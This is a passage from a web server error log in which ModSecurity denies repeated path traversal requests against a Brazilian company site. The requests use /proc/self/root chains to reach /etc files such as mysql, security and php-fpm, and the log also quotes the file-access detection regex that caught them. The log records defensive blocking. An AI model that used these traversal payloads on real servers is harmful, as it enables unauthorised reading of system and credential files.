"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgLrXbQATo66fKoS7xDZQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:54:54.766198 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:34950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgLro6lpbStxTqkSktjTgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:55:15.925175 2026] [access_compat:error] [pid 10772:tid 140411716749056] [client 65.111.2.55:10455] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:55:16.869171 2026] [access_compat:error] [pid 10772:tid 140411649607424] [client 65.111.2.55:29997] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:55:17.846463 2026] [access_compat:error] [pid 21805:tid 140411691570944] [client 65.111.2.55:13393] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:55:25.426812 2026] [access_compat:error] [pid 32654:tid 140411708356352] [client 104.207.54.41:47161] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:55:26.318934 2026] [access_compat:error] [pid 32654:tid 140411565680384] [client 104.207.54.41:62447] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:55:27.194016 2026] [access_compat:error] [pid 32654:tid 140411641214720] [client 104.207.54.41:32785] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:56:06.456237 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.228.16:42018] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgL9Jqj1wV0Si-OkefgiQAAAA4"]
[Mon Mar 16 10:57:32.530588 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.241.46:50166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMTHbQATo66fKoS7xDnwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:57:33.795051 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:47680] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMTXjZBu2q05ozVU9LWQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:12.570185 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:40806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMdHjZBu2q05ozVU9LhAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:13.859162 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:57738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMdXbQATo66fKoS7xDpwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:15.903837 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:57740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMd3bQATo66fKoS7xDqAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:17.243795 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:57750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMeXbQATo66fKoS7xDqgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:18.464980 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:57758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMerABkC4fWIHEf8HhbQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:19.707935 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:57764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMe_9ocpUE4ed4uDzi8QAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:21.215954 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:33082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMfY6lpbStxTqkSktjYwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:22.389270 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:33094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMfv9ocpUE4ed4uDzi8gAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:23.671051 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:33106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMf46lpbStxTqkSktjZAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:24.844703 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:33116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMgLysWC90G-1nBrA6kwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:27.132240 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:33124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMg7ysWC90G-1nBrA6lQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:30.660631 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.244.31:40696] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgMhpqj1wV0Si-Okefg2wAAAAs"]
[Mon Mar 16 10:58:31.918058 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:33128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMhwlT9VtDQc7bgUyjEwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:34.245333 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.243.203:60994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMirysWC90G-1nBrA6lwAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:35.550924 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:60996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMi9SswJuvopo3lOhV4gAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:36.722507 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:60998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMjLysWC90G-1nBrA6mAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:39.160317 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:32780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMj_9ocpUE4ed4uDzi-QAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:58:41.551802 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:57490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 